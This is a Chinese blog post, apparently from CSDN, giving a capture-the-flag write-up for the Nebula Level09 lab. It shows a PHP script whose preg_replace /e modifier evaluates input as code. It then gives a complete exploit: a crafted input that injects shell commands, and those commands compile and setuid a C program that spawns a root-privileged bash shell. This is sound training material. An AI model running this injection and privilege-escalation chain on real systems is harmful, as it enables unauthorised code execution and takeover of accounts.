ExploitExercises_Nebula_Level09

最新推荐文章于 2020-02-18 10:06:43 发布

小黑话不多

最新推荐文章于 2020-02-18 10:06:43 发布

阅读量470

点赞数

分类专栏： ExploitExercise

本文链接：https://blog.csdn.net/hurricane_0x01/article/details/53924551

版权

ExploitExercise 专栏收录该内容

13 篇文章 0 订阅

订阅专栏

题目给出一段PHP代码：

<?php

function spam($email)
{
  $email = preg_replace("/\./", " dot ", $email);
  $email = preg_replace("/@/", " AT ", $email);
  
  return $email;
}

function markup($filename, $use_me)
{
  $contents = file_get_contents($filename);

  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
  $contents = preg_replace("/\[/", "<", $contents);
  $contents = preg_replace("/\]/", ">", $contents);

  return $contents;
}

$output = markup($argv[1], $argv[2]);

print $output;

?>

若输入参数符合[email (.*)]正则形式，则将@替换为 AT，将. 替换为dot。

漏洞是因为该正则表达式设置了/e选项，设置该选项后php会将正则替换后的结果作为代码执行。

依然在/home/level09目录下创建如下代码：

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/bin/bash");
}

然后创建输入文件in.txt，内容如下：

[email "{${`gcc -o /home/flag09/level09 /home/level09/level09.c;chmod +s /home/flag09/level09`}}"]

运行程序：

/home/flag09/flag09 /home/level09/in.txt

将在/home/flag09目录下生成level09 可执行文件，运行即可。

小黑话不多

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
ExploitExercises_Nebula_Level09

题目给出一段PHP代码：<?phpfunction spam($email){ $email = preg_replace("/\./", " dot ", $email); $email = preg_replace("/@/", " AT ", $email); return $email;}function markup($filename, $use_me
复制链接

扫一扫